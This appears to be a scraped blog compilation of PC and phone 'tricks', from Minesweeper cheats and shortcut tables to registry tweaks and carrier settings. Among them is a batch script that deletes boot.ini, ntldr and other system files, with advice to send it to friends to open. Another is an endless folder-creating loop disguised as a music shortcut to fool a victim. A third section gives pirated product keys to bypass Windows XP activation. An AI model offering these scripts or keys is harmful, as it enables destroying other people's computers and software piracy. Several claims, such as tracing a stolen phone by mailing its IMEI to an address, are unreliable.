Pinball Secret - Extra Balls

Instructions - 

Type 1max at the start of a new ball to get extra balls.
 

Secret - Gravity Well
 


Instructions - Type gmax at the start of a new game to activate the Gravity Well.
 

Secret - Instant Promotion
 

Instructions - Type rmax at the start of a new game to go up in ranks.

Stop Timer in Minesweeper

Instructions - Launch Minesweeper and start a game so the timer starts counting, then press the Windows Key + D to show the desktop. Now when you select minesweeper from the taskbar you can continue playing with the timer stopped.

Minesweeper secret

Instructions - 

Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. 


This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.

Zooming in and out in Browser


Hold Ctrl key and use the up/down scroll of the mouse wheel to zoom in and out in any browser.
To reset to the origianl font size hold Ctrl key and press 0. (Ctrl + 0)

Changing Startup and Log-off screens

Startup Screen

  1. Create a 320x400 bitmap in the root directory and name it LOGO.SYS
  2. You can use LOGOW.SYS file in the Windows directory as a starter
Logoff Screens



  1. There are many system file that constitutes Lofoff screen.
  2. They are actually bitmaps 320x400 that just have a different extension
  3. The hidden file in the root directory LOGO.SYS is the startup logo.
  4. There are two files in the Windows directory.
  5. LOGOW.SYS is the Wait while Shutting down ... screen.
  6. LOGOS.SYS is the You may now shut-off or Reboot screen.
  7. Make two new image files of your chice in Paint and name it as LOGOW.SYS and LOGOS.SYS and replce the actual windows file by this two.
  8. But make sure they should be of the same size

To unlock your phone

To unlock your phone put a sim from another company,
  now type *#9998*3323# it will reset your phone. Push exit and then push 7,
  it will reset again. Put your other sim in and it will say sim lock,
  type in 00000000 then it should be unlocked. Type in *0141# then



  the green call batton and it's unlocked to all networks.
  This code may not work on the older phones and some of the newer phones.
  If it doesn't work you will have to reset your phone without a sim in it
  by typing *#2767*2878# or *#9998*3855# (not tested)

Other Samsung Codes

 *#9998*4357# Help Menu
  *#9998*5282# Java menu (GRPS/CSD settings for JAVA server)
    *#9999#0# Monitor Mode
  *#9999# or *#9998*9999# Software Version
  *#8888# or *#9998*8888# Hardware Version
  *#9998*746# or *#9998*0746# or *#0746# Sim Infos
  *#9998*523# or *#9998*0523# or *#0523# Display Contrast



  *#9998*842# or *#9998*0842# or *#0842# Vibration On (until you push OK)
  *#9998*289# or *#9998*0289# or *#0289# Buzzer On (until you push OK)
  *#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos
  *#9998*377# or *#9998*0377# Error log
  *#9998*778# or *#9998*0778# or *#0778# Sim Service table
  *#9998*782# show date and alarm clock
  *#8999*638# show network information
  *#9998*5646# change operator logo at startup
  *#9998*76# production number
  *#9998*968# view melody for alarm
  *#9998*585# Non-Volatile Memory (NVM)
  *#3243948# Digital Audio Interference Off
  *#32436837# Digital Audio Interference On

Unlock any phone Security code

unlock phone

‘Read the full post before trying this’

Think how worse wiill that be if you do not know the security code of your own cell phone?
i.e. If you have forgotten or If someone might have changed it.
Do not worry I will let you know about the procedure to unlock your locked Nokia(for other phones see the next method below this) phone with a “MASTER CODE” (Note: This wont work for some Models).
For NOKIA :-
Phone Security Code


You can get “Nokia MASTER CODE” for your phone using ur
phone’s IMEI.
After getting IMEI CODE
Visit:
www.nokiamastercode.com/
or
www.nokialockcode.com/mastercode.php
or
www.nokialockcode.com/calculate.php
After getting your phone’s master code use it in the place of security code.
If this does not work try the another trick given below.

“For Nokia,Sony,Alcatel ,Siemens, Vitel, Maxel, Panasonic, AEG, Samsung, Motorola and LG” :-


For other phone models including nokia this trick looks comfortable than the above one.
First of all for you is to download a 150kb “MASTER CODE UNLOCKER” to your computer and then you can get the master code for your phone. upon which you can use it to unlock phone.


Download it from here:
 Download Now

If you still find any problem with the Code generation. Feel free to contact me on xtremecoder64@gmail.com.

make your pc faster than before

Now I am gonna show you how to make your pc faster than before. I can make your pc about 200% faster. To make you PC faster than before please folow the steps
# Go to start then click run and then type regedit


 
# Select HKEY_CURRENT_USER and then select control panel folder and then select desktop folder. Do it correctly
# You will see registry setting at your right hand side, after that select menu show delay and then right click and select modify.
# you will find edit string option -----> default value data is 400 , you have to change the value Data to 000
# Restart your computer. You will notice that your computer has become much more faster.
(Note : This will help you to start your computer start quickly,

How to modify any exe files

Learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.

try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at h**p://www.users.on.net/johnson/resourcehacker/




2) Unzip the archive, and run ResHacker.exe. You can check out the help file too


3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.


5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.


TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.

Create A Personal Screen Saver In Win Xp ! ! !

This isn't a tweak, but a great little feature! For a great way to put your digital photos to work, try creating a slide show presentation for use as a screen saver. Here's how:

1. Right-click an empty spot on your desktop and then click Properties.

2. Click the Screen Saver tab.




3. In the Screen saver list, click My Pictures Slide show.

4. Click Settings to make any adjustments, such as how often the pictures should change, what size they should be, and whether you'll use transition effects between pictures, and then click OK.

Now your screen saver is a random display of the pictures taken from your My Pictures folder.

How to copy songs from your iPod to your PC

Let me introduce you with a straightforward way for Windows users to transfer music from an iPod to your hard drive, without extra software:

1. Connect the iPod to your PC. If iTunes starts syncing (ie erasing) your music automatically, hit the X in the upper right hand corner of iTunes display, to the left of the search box, to stop it.
2. In Control Panel, Portable Media Devices, double-click your iPod.



3. Navigate to the Music folder.
4. Select all the music folders, and drag and drop them into a folder on your hard drive, or directly into iTunes.

And you’re done! The iPod music folder structure is strange and inexplicable, but once you move your files into iTunes you can set it to automatically organize your folder by artist and album to clean that up. (To do this, in iTunes Edit menu, choose Preferences and in the Advanced tab, check “Keep iTunes Music Folder organized.”)

If you give this a go, lemme know how it goes. I’ll amend the instructions with any additional info for other versions of Windows and iPods.

Remote Shutdown

XP PRO has a lot of fun utilities. One of the most useful ones I have found to date is the ability to remotely reboot a PC. There are 2 ways of doing this. You will need to have admin access to the PC to preform these actions. That being said, here is the first way to do it:

Right click my computer, choose manage.
Highlight the Computer Management (Local) then click on Action, choose connect to another computer.



In the window that opens fill in the machine name of the PC you want to connect to and click ok.
Once connected right click on Computer Management (Remote machine name) and choose properties.
Go to the "Advanced" tab and click the Settings button under Start up and recovery.
Click on the Shutdown button.
Under action choose what you want to do (you can log off current user, shut down, restart, or power down. you can also choose if you want to force all applications to close, close hung apps, or wait for all apps to close by themselves).

The second way... Remember dos... that good old thing. Open up a command prompt and enter in the following:

%windir%\System32\shutdown.exe -r -m \\Machinename. The command prompt has more switches and options. I highly suggest using shutdown.exe /? to see all the possibilities.

Brand Windows with Your Name

Let's do some fun stuff today....

open notepad copy the following lines into it and save it with the name OEMINFO.INI  in the c:\windows\system32 directory:


-------------------------------------------------------------------------------------
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here

-------------------------------------------------------------------------------------

1. Save the file.

2. Then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.

3. Now if you want to display some more information then simply increase the line in the file.

ex: Line4=Your Working Hours Here




Solitare Win Win

Force Solitare to win by a hack. Here’s how: Open sol.exe located in C:\Windows\System32\ using Resource Hacker. Expand String Table > 64 > 1033 in the left pane. Notice a line in the right pane saying 1010, “Force a win”. Use these numbers to enable the Easter Egg. Now expand Menu > 1 > 1033. Create a menu by typing the following just before the last closing brace:
POPUP “&Easter Egg”
{
MENUITEM "&Egg 1", 1008
MENUITEM "&Egg 2", 1009
MENUITEM "&Egg 3", 1010
}

Now, click the Compile Script button. Next, go to File > Save and save it in the original location, i.e., C:\Windows\System32\sol.exe. Also, replace sol.exe in the C:\Windows\System32\dllcache folder.

Now, a new menu Easter Egg appears with Egg 1, Egg 2 and Egg 3 as options. Click Egg 3 to force a win.

Disabling My Computer

 In areas where you are trying to restrict what users can do on the computer, it might be beneficial to disable the ability to click on My Computer and have access to the drives, control panel etc.
To disable this:
1.Open RegEdit
2.Search for 20D04FE0-3AEA-1069-A2D8-08002B30309D
3.This should bring you to the HKEY_CLASSES_ROOT\CLSID section
4.Delete the entire section.
Now when you click on My Computer, nothing will happen.
You might want to export this section to a Registry file before deleting it just in case you want to enable it again. You can also hide all the Desktop Icons, see Change/Add restrictions.

Trick to Make over 1,000 folders in few seconds

Here I will teach you a simple prank that will make an unlimited amount of folders in any place you want.

1. Open notepad and type :
@echo off
:top
md %random%
goto top 

@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creates folders with random names.
goto top – return to label :top, infinite loop.


2. Save it as 1000folders.bat
3. After that you will get icon that looks as show below:
People probably are not gonna click on an icon that looks like this picture, so to make it better (funnier and easier to prank people with) make a short-cut to it.
4. Right click on icon and click Create Shortcut.


5. Right click on shortcut and click properties , then click on Change Icon and rename icon.


Tell the person that you found the music they wanted and downloaded it on their computer. That way, they will think its a shortcut to the music and they will click on it. Then, they will think its loading so they won’t exit right away but when they finally realize its not going to load  it will be to late. Its impossible to delete them using cmd you have to find all of them and delete them manually…

A Computer Tricks to Shut Down a Computer Forever

Open notepad and copy/paste this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini


del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Now Save it as a .bat file.
This would shut down the person’s computer. It shuts it off once and deletes the files needed to reboot and restart.

* USe at your own risk

REMEMBER – DO NOT CLICK THIS FILE. YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
Send it to your friends computer and tell them to open it. Have fun!!

 

Shake Your Computer

Funny Computer Trick
Check out these funny trick.  

  •    Copy and paste the java script code to the address bar of your browser                                                javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i–) {for (j = n; j > 0; j–) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

    2: Press enter and watch your window’s “shaking it”.  You can change the value of i if you wish :-)


Send free sms from your phone ( works on all networks )

If you are smartphone user, this is a must have app for you, This is the best messaging application available in the market.This little thing is tested and works with all operators in all countries.
image
WhatsApp is an application that supports iphone,few selected nokia, All Android and Blackberry phones,


An awesome application that requires only active internet connection to send the messages, It uses push messaging technologies and offers chat style threaded messaging interface which makes it the best chat software available ever.
Here is what is needed to get started with whatsapp
1.  A smartphone – android, blackberry, Iphone or Few selected nokia phones.
2. Working Internet connection on your phone (2g, 3g or wi-fi).
And you are all set to send free smses. The best part is it automatically adds contacts from the phonebook and displays the ones that already use whatsapp :)
Headover to whatsapp.com to download this application for your phone.
image

Reliance GSM GPRS/WAP settings

APN : smartwap
Login Request Required : off
Authentication : PAP
Data Compression : off
Header Compression : off


Service Name : rwap
Homepage/WAP Page : http://wap.rworld.co.in
Proxy : Yes
Proxy Server Address : 10.239.221.7
Port : 8080
User Name : [Empty]
Password : [Empty]
Alternate methodes:

You can also get the GPRS & MMS settings on your phone by sending
SMS [ALL to 55100] to receive WAP/GPRS/MMS settings (toll-free).
Or Else you may also send an SMS as “WAP” to 55100 to recieve wap/GPRS settings

Popular android phones and their price in India

Android phones are booming the Indian mobile market. Here are some of the most popular android phones and their current market price in India.
  1. HTC wildfire :  9500/-
  2. Samsung Galaxy ace : 12000/-
  3. HTC Tatto : 12000/-
  4. Samsung Galaxy 551 : 8800/-
  5. Motorola Defy : 13500/-
  6. HTC Desire S : 21500/-
  7. HTC Desire HD : 24500/-
  8. Samsung Galaxy S : 27000/-
  9. Motorola milestone : 17500/-
  10. Samsung Galaxy pop : 7750/-
Prices indicated here are for reference purpose only and may vary

Make Android to Android / Iphone Free VOIP phone Calls

Here’s a quick short post on How to make free voip calls using an Iphone or Android.
Iphone and Android phones ssupport loads of applications that allow you to make free phone to phone calls to other smartphone devices. But here is the trick; Both the devices should have internet i.e. wifi/3g/2g  enabled and should be running the same applications on the phone.

Applications that support free phone to phone calls :
Skype:
Skype is world’s most popular PC to PC telephony service with more than 350 million users across the globe. Well thats old news; Good news is Skype has a mobile app. You can make free call to another user who is on skype using your mobile phone. If your friend is also a smartphone user (Android or Iphone) you can make free calls to them.
Download skype for your phone here :
http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/
Viber :
Viber is a mobile calling service that works on mobile phones with wifi & 3g internet. Viber not only supports free calling but also supports free text messaging to other viber users. You can also make Viber as a default dialer for your android phone.
Download Viber for your phone here :
http://www.viber.com/

Yahoo Messenger :
The yahoo messenger app for android also supports free calls to other devices running yahoo messenger.
In order to enjoy superior  call-quality you should be using 3g, However 2g Edge networks of Vodafone & Airtel are good enough & give good speed to support voice call quality.

Free GPRS Settings FOR IDEA

GPRS on Idea simcards is by default activated,
In order to use it over mobile phones, use following settings:


Primary ip : 10.4.42.15
Primary port : 9201
Secondary ip = blank
port = blank
user = blank
pass= blank
APN GPRS = imis
If other applications on your mobile such as Google Maps etc. stop working , you should try apn name as ” Internet “. It has worked for me.
!dea GPRS settings
If you have any issues do leave comments…

hide your important data from other users

Normally when you need to secure your important data from other users, then your first choice is to burn it on CD or put it to removable drive instead of hard drive. But imagine if your data size is more than 100 GB then it is not easy to burn it on CD. No worry, you can save your full drive from other users access using this trick. Check out InfoSec Institute for IT courses including computer forensics boot camptraining
 
Perform the given steps to hide your system data partition: 
 
  • To enable this feature, you will need to be logged into your computer with administrative rights. 
  •  
  • First click on Start button to open "Run" and type "CMD" (without the quotes) then press Ok button to open Command Prompt.


 
Now type diskpart on the blinking cursor and wait for 5 seconds to appear diskpart> utility.
 
 
To show the list of volume, type list volume command after the diskpart> prompt, this command will show you all system drives detail.
 
 
Now first select the volume that you want to hide, for example, 
if you need to hide F drive then first type select volume 2 (in this case) and press enter button.
 
 
After loading volume, type remove letter F (in this case) to hide F drive.
 
 
Now exit from command prompt and open My Computer to verify drives. 
 
But next time, when you want to unhide the D drive, just run assign drive F command after loading volume 2.
 

clear your sensitive information on system shutdown

During data processing some operating systems use the hard disk as memory, called virtual memory. During processing, operating system transfers some data and programs from RAM to hard disk and reloads again when required. The data or programs are stored in hard disk in temporary file called the swap file. This technique of swapping data between memory and hard disk is called paging. Operating system spends a lot of time in paging process, instead of executing the application software. But the problem is that while working you use different software programs on computer and page file may contain your confidential information or stored in non encrypted format. To reduce this risk, you can set your computer to clear out page file automatically each time you shutdown your computer.
 
Perform the given steps to set your system clear page file automatically:
 
  • To enable this feature, you will need to be logged into your computer with administrative rights.
  • First click on start button to open control panel and then click here on "Administrative Tools" option.



  •  
  • Now "Local Security Settings" panel will appear, on lift side of this panel click on "Local Policies".
  • Here click on "Security Options" then double click on "Shutdown: Clear virtual memory pagefile" option.
 
 
  • Now small dialog box will appear with options, "Enabled or Disabled" the page file.

    • Select the "Enabled" radio button to set clear page file each time you shutdown computer.
     
     
    Press Apply button to save settings and then click on Ok button to finish.

Microsoft Windows shortcut keys

Shortcut Keys3.x9xMENT2KXPVista7Description
Alt + TabXXXXXXXXSwitch between open applications.   
Alt + Shift + TabXXXXXXXXSwitch backwards between open applications. 
Alt + double-click
XXXXXXXDisplay the properties of the object you double-click on. For example, doing this on a file would display its properties.
Ctrl + TabXXXXXXXXSwitches between program groups or document windows in applications that support this feature.







 
Alt + Print ScreenXXXXXXXXCreate a screen shot only for the program you are currently in.
Ctrl + Print Screen    XXXXCreates a screen shot of the entire screen
Ctrl + Alt + DelXXXXXXXXReboot the computer and brings up the Windows task manager.
Ctrl + Shift + Esc       X XXX Immediately bring up the Windows task manager.
Ctrl + EscXXXXXXXXBring up the Windows Start menu. In Windows 3.x this would bring up the Task Manager.
Alt + Esc
XXXXXXXSwitch Between open applications on taskbar.
F1XXXXXXXXActivates help for current open application.
F2XXXXXXXXRenames selected Icon.
F3
XXXXXXXStarts find from desktop.
F4
XXXXXXXOpens the drive selection when browsing.
F5
XXXXXXXRefresh Contents to where you were on the page.
Ctrl + F5      XXRefreshes page to the beginning of the page.
F10XXXXXXXXActivates menu bar.
Shift + F10
XXXXXXXSimulates right-click on selected item.
F4
XXXXXXXSelect a different location to browse in the Windows Explorer toolbar.
Alt + F4XXXXXXXXCloses Current open program.
Ctrl + F4XXXXXXXXCloses Window in Program.
F6
XXXXXXXMove cursor to different Windows Explorer pane.
Alt + Space barXXXXXXXXDrops down the window control menu.
Ctrl + (the '+' key on the keypad)

XXXXXXAutomatically adjust the widths of all the columns in Windows explorer
Alt + Enter
XXXXXXXOpens properties window of selected icon or program.
Alt + Space bar XXXXXXXOpen the control menu for the current window open.
Shift + Del
XXXXXXXDelete programs/files without throwing them into the recycle bin.
Holding ShiftXXXXXXXXBoot Safe Mode or by pass system files as the computer is booting.
Holding Shift
XXXXXXXWhen putting in an audio CD, will prevent CD Player from playing.
EnterXXXXXXXXActivates the highlighted program.
Alt + Down arrow
XXXXXXXDisplay all available options on drop down menu.
* (on the keypad)
XXXXXXXExpands all folders on the currently selected folder or drive in Windows Explorer.
+ (on the keypad)
XXXXXXXExpands only the currently selected folder in Windows Explorer.
- (on the keypad)
XXXXXXXCollapses the currently selected folder in Windows Explorer.

What are the F1 through F12 keys

F1
  • Almost always used as the help key, almost every program will open the help screen when this key is pressed.
  • Enter CMOS Setup.
  • Windows Key + F1 would open the Microsoft Windows help and support center.
  • Open the Task Pane.
F2
  • In Windows commonly used to rename a highlighted icon or file.
  • Alt + Ctrl + F2 opens document window in Microsoft Word.
  • Ctrl + F2 displays the print preview window in Microsoft Word.
  • Enter CMOS Setup.


F3

  • Often opens a search feature for many programs including Microsoft Windows.
  • In MS-DOS or Windows command line F3 will repeat the last command.
  • Shift + F3 will change the text in Microsoft Word from upper to lower case or a capital letter at the beginning of every word.
F4
  • Open find window.
  • Repeat the last action performed (Word 2000+)
  • Alt + F4 will close the program currently active in Microsoft Windows.
  • Ctrl + F4 will close the open window within the current active window in Microsoft Windows.
F5
  • In all modern Internet browsers pressing F5 will refresh or reload the page or document window.
  • Open the find, replace, and go to window in Microsoft Word.
  • Starts a slideshow in PowerPoint.
F6
F7
  • Commonly used to spell check and grammar check a document in Microsoft programs such as Microsoft Word, Outlook, etc.
  • Shift + F7 runs a Thesaurus check on the word highlighted.
  • Turns on Caret browsing in Mozilla Firefox.
F8
  • Function key used to enter the Windows startup menu, commonly used to access Windows Safe Mode.
F9
  • Opens the Measurements toolbar in Quark 5.0.
F10
F11
F12
  • Open the Save as window in Microsoft Word.
  • Shift + F12 save the Microsoft Word document.
  • Ctrl + Shift + F12 prints a document in Microsoft Word.
  • Preview a page in Microsoft Expression Web
  • Open Firebug.

Basic PC shortcut keys

The below basic shortcut keys are a listing of shortcut keys that will work with almost all IBM compatible computers and software programs. It is highly recommended that all users keep a good reference of the below shortcut keys or try to memorize the below keys. Doing so will dramatically increase your productivity.
Shortcut KeysDescription
Alt + FFile menu options in current program.
Alt + EEdit options in current program
F1Universal Help in almost every Windows program.
Ctrl + ASelect all text.
Ctrl + XCut selected item.
Shift + DelCut selected item.
Ctrl + CCopy selected item.
Ctrl + InsCopy selected item
Ctrl + VPaste
Shift + InsPaste
HomeGoes to beginning of current line.
Ctrl + HomeGoes to beginning of document.
EndGoes to end of current line.
Ctrl + EndGoes to end of document.
Shift + HomeHighlights from current position to beginning of line.
Shift + EndHighlights from current position to end of line.
Ctrl + Left arrowMoves one word to the left at a time.
Ctrl + Right arrow Moves one word to the right at a time.

Make your Computer Speak whatever you type.



This is an amazing trick to amaze your friends.By using this trick you can make your computer to speak whatever you type.This trick is working on all microsoft operating system and does not require any programming skills.You have to follow just simple steps and your own Text to Voice software will be ready.If you show this software to any of your friends he will be certainly impressed with you .





Ok, the trick is fairly simple and requires only 2 simple steps from your side.Let’s Begin the tutorial to Make Your Computer Speak Whatever You Type
here is a trick to convert your
TEXT to VOICE without any
software.
­
­Steps are :
­
1) Go to Start > Run
­ 


2) Type : Control speech

Write any Text and then click on "Preview Voice" and it will be converted to voice.

I hope you enjoyed this trick

Track Stolen Mobile

Now a days each one of us carry Hi Fi Mobile devices and always fear that it may be stolen.



Each mobile carries a unique IMEI i.e International Mobile Identity No which can be used to track your mobile anywhere in the world.




This is how it works!!!!!!



Dial *#06# from your mobile.

Your mobile shows a unique 15 digit .

Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.

Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net

No need to go to police.

Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.

You will get your Mobile  even its number is changed.

Remove Stored username and Passwords !

here are three ways to remove the Stored User Names and Passwords from your system, 


1) Click Start, Run and type Control keymgr.dll
Remove the entries from the list.

2) Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords

3) From Control Panel, select your User Account, click Manage your network passwords

Reduce your system booting time!

Hello friends you can decrease the windows booting time by using following tips:

First
-------------------------
1. Click at the Start icon
2. Then click run
3. type msconfig, which will open a new window.


 


4. select startup then check the programms which u wish to run at start up. Un check rest of them which u do not want to run at start up. After that restart your windows.


Second
--------------------------
open the folder c:windowstemp and then delete everything in it...... select all and delete

Third ( it will also increase your internet speed)
--------------------------
open documents and settings folder
then choose your login folder
then unhide everything from folder options
then you will find a folder local settings
then open the temp folder
then delete everything in it......... select all and delete
then come back to local settings folder
then open temp internet files folder
then delete everything in it......... select all and delete

At last re boot your machine...

DISPLAY MESSAGE ON STARTUP

Open Run & type regedit

Go to HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon.

Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say.

Restart and Enjoy!

Validate Your Non-Original Windows XP

1- Click in start and then in run

2- Type in regedit and then ok

3- In the regedit, go to this following key:






HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi

ndowsNT\CurrentVersion\WPAEvents

4- On the right panel, double click in OOBETimer

5- In the opened window delete all values and click OK. Shut the regedit

6- Go again in start > run and this time type:

%systemroot%\system32\oobe\msoobe.exe /a

7- In the window that oppened, choose the option... YES I WISH TO MAKE A PHONE CALL... ( or something similar to this sentence )

8- In the next step, click in the button that says CHANGE PRODUCT KEY ( or something similar )

9- In the next step, type a CD-Key:

THMPV-77D6F-94376-8HGKG-VRDRQ or JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ and click to update

10- After clicking in the update button, the assistant to activation will return one page, then click in " remember me later ", and restart Windows again.

11- Restart Windows, go again in start > run and type:

%systemroot%\system32\oobe\msoobe.exe /a

12- The following message will appear:

Windows activation

Windows is now activated

Trick to Post Empty Status on Facebook Trick to Post Empty Status on Facebook






We usually update our facebook status with a quote or share a line about our day.All of us want to get attention of others to our status.In one of my earlier post I wrote about the trick to Update your facebook status with any device(blackberry,iphone,ipad etc) .
How would you feel if you see a blank status update from someone? Amazed!!
You can’t write a blank status update by simply pressing the Space key and then clicking on Post button.Instead you have to use special codes to write a blank character in your facebook status.
Trick to Post Empty Status on Facebook:-
  • Login to your Facebook Account and go to Update Status field.
  • Press and hold Alt key and just type 0173.
  • Release Alt Key and click on share Post.
  • That’s all now your empty status will be update.
If the above trick doesn’t work in your account then type   @[0:0: ] in your status and share it.

. How to Change the Logon Screen Background in Windows 7



How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.
1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to
C:\Windows\system32\oobe\info\backgrounds
You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start - Run -Type regedit) and navigate to the following key
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background
If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.
I hope you like this trick. Just try out and give your feedback!

Browser Shaking

This is a fun little trick that can create a shaking screen on your web browser (i.e. Internet Explorer, etc..)
The trick is simply a small Java Script that causes your browser window to move to different positions, causing a shake of your entire screen. It's kind of cool to watch and see what Java Script can do! Try it out..
Use this trick at your own risk.
Here's how:
Copy this entire line and paste it onto your address box, then press Enter:


javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

Use Keyboard As Mouse

When mouse isn’t working properly , this trick can be very helpful. To activate mouse keys all you do is press Alt+Left shift key + NumLock and click OK or press enter .

Use the Numerical pad for controlling the mouse pointer.
5 is for click.
+ is for double click
- for right click.

What to Do When Your Email Account is Hacked?




For Gmail:

 
It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.
Step -1: Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link
If you cannot find success from the Step-1 then proceed to Step-2.
 
Step-2: Many times the hacker will change the secret question and secondary email address right after the account is compromised. This is the reason for the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like
1. Email addresses of up to five frequently emailed contacts
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…
You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out this form. This is your last chance! The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link
 

For Yahoo and Hotmail:

 
Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option. 
To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.
I hope this post will help you recover the lost account

What is CAPTCHA and How it Works?

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. The following image shows the typical samples of CAPTCHA.
 
Captcha
 
Almost every Internet user will have an experience of CAPTCHA in their daily Internet usage, but only a few are aware of what it is and why they are used. So in this post you will find a detailed information on how CAPTCHA works and why they are used.
 

What Purpose does CAPTCHA Exactly Serve?

CAPTCPA is mainly used to prevent automated software (bots) from performing actions on behalf of actual humans. For example while signing up for a new email account, you will come across a CAPTCHA at the end of the sign-up form so as to ensure that the form is filled out only by a legitimate human and not by any of the automated software or a computer bot. The main goal of CAPTCHA is to put forth a test which is simple and straight forward for any human to answer but for a computer, it is almost impossible to solve.
 

What is the Need to Create a Test that Can Tell Computers and Humans Apart?

For many the CAPTCHA may seem to be silly and annoying, but in fact it has the ability to protect systems from malicious attacks where people try to game the system. Attackers can make use of automated softwares to generate a huge quantity of requests thereby causing a high load on the target server which would degrade the quality of service of a given system, whether due to abuse or resource expenditure. This can affect millions of legitimate users and their requests. CAPTCHAs can be deployed to protect systems that are vulnerable to email spam, such as the services from Gmail, Yahoo and Hotmail.
 

Who Uses CAPTCHA?

CAPTCHAs are mainly used by websites that offer services like online polls and registration forms. For example, Web-based email services like Gmail, Yahoo and Hotmail offer free email accounts for their users. However upon each sign-up process, CAPTCHAs are used to prevent spammers from using a bot to generate hundreds of spam mail accounts.
 

Designing a CAPTCHA System

CAPTCHAs are designed on the fact that computers lack the ability that human beings have when it comes to processing visual data. It is more easily possible for humans to look at an image and pick out the patterns than a computer. This is because computers lack the real intelligence that humans have by default. CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify. Sometimes characters are striked out or presented with a noisy background to make it even more harder for computers to figure out the patterns.
